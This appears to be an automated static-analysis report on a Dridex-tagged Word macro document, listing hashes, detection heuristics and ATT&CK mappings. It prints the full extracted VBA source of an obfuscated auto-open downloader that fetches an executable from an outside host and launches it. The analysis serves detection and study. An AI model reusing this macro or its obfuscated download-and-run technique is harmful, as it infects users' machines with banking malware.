Dridex — Office (OLE) malware analysis

Static analysis result for SHA-256 52e7cf353466ed7a…

MALICIOUS

Office (OLE)

39.0 KB Created: 2015-03-08 23:46:00 Authoring application: Microsoft Office Word First seen: 2015-03-15
MD5: a93b037fbc33b44534318540dbb9d6f1 SHA-1: 69b78737d813d444bbaba0eede220552752839e2 SHA-256: 52e7cf353466ed7a34da9fd5be5b14ac25a364493ac41ab7626b421904277943
376 Risk Score

Malware Insights

Dridex · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of URLDownloadToFile and obfuscated auto-exec loaders, suggesting the macro's purpose is to download and execute a secondary payload. ClamAV detection as Doc.Trojan.Dridex-7 further supports this assessment.

Heuristics 10

  • ClamAV: Doc.Trojan.Dridex-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Dridex-7
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    рпорпАавпавп FhjvhjsdfksdfF(Chr$(104) & Chr$(40) & Chr$(116) & Chr$(69) & Chr$(116) & Chr$(83) & Chr$(112) & Chr$(86) & Chr$(58) & Chr$(104) & Chr$(47) & Chr$(50) & Chr$(47) & Chr$(40) & Chr$(99) & Chr$(96) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(63) & Chr$(101) & Chr$(75) & Chr$(110) & Chr$(112) & Chr$(101) & Chr$(127) & Chr$(46) & Chr$(107) & Chr$(100) & Chr$(68) & Chr$(101) & Chr$(59) & Chr$(47) & Chr$(60) & Chr$(106) & Chr$(57) & Chr$(115) & Chr$(66) & Chr$(47) & Chr$(37) & Chr$(98) & Chr$ …
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5345 bytes
SHA-256: 5d2083fe1fa0609a69a7dbf96641768d6d3fad7e3b373aa1b8ef6aa4ae9c792f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
FUvhdsfkHJfg
End Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "АавпавпАА"

Public Function FhjvhjsdfksdfF(VdkAbaqgjbz As String) As String
For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
FhjvhjsdfksdfF = FhjvhjsdfksdfF & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
Next
End Function


Attribute VB_Name = "ываывААва"
#If VBA7 Then
    Private Declare PtrSafe Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As LongPtr) As LongPtr
#Else
    Private Declare Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As Long) As Long
#End If
Sub FUvhdsfkHJfg()
рпорпАавпавп FhjvhjsdfksdfF(Chr$(104) & Chr$(40) & Chr$(116) & Chr$(69) & Chr$(116) & Chr$(83) & Chr$(112) & Chr$(86) & Chr$(58) & Chr$(104) & Chr$(47) & Chr$(50) & Chr$(47) & Chr$(40) & Chr$(99) & Chr$(96) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(63) & Chr$(101) & Chr$(75) & Chr$(110) & Chr$(112) & Chr$(101) & Chr$(127) & Chr$(46) & Chr$(107) & Chr$(100) & Chr$(68) & Chr$(101) & Chr$(59) & Chr$(47) & Chr$(60) & Chr$(106) & Chr$(57) & Chr$(115) & Chr$(66) & Chr$(47) & Chr$(37) & Chr$(98) & Chr$(51) & Chr$(105) & Chr$(64) & Chr$(110) & Chr$(96) & Chr$(46) & Chr$(48) & Chr$(101) & Chr$(46) & Chr$(120) & Chr$(77) & Chr$(101) & Chr$(58)), Environ(FhjvhjsdfksdfF(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
109) & Chr$(80) & Chr$(123))) & FhjvhjsdfksdfF(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))


End Sub
Function рпорпАавпавп(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
плрпААавпп = гшПНШываа(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))

ываААвыаыва.Open Environ(FhjvhjsdfksdfF(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & FhjvhjsdfksdfF(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
End Function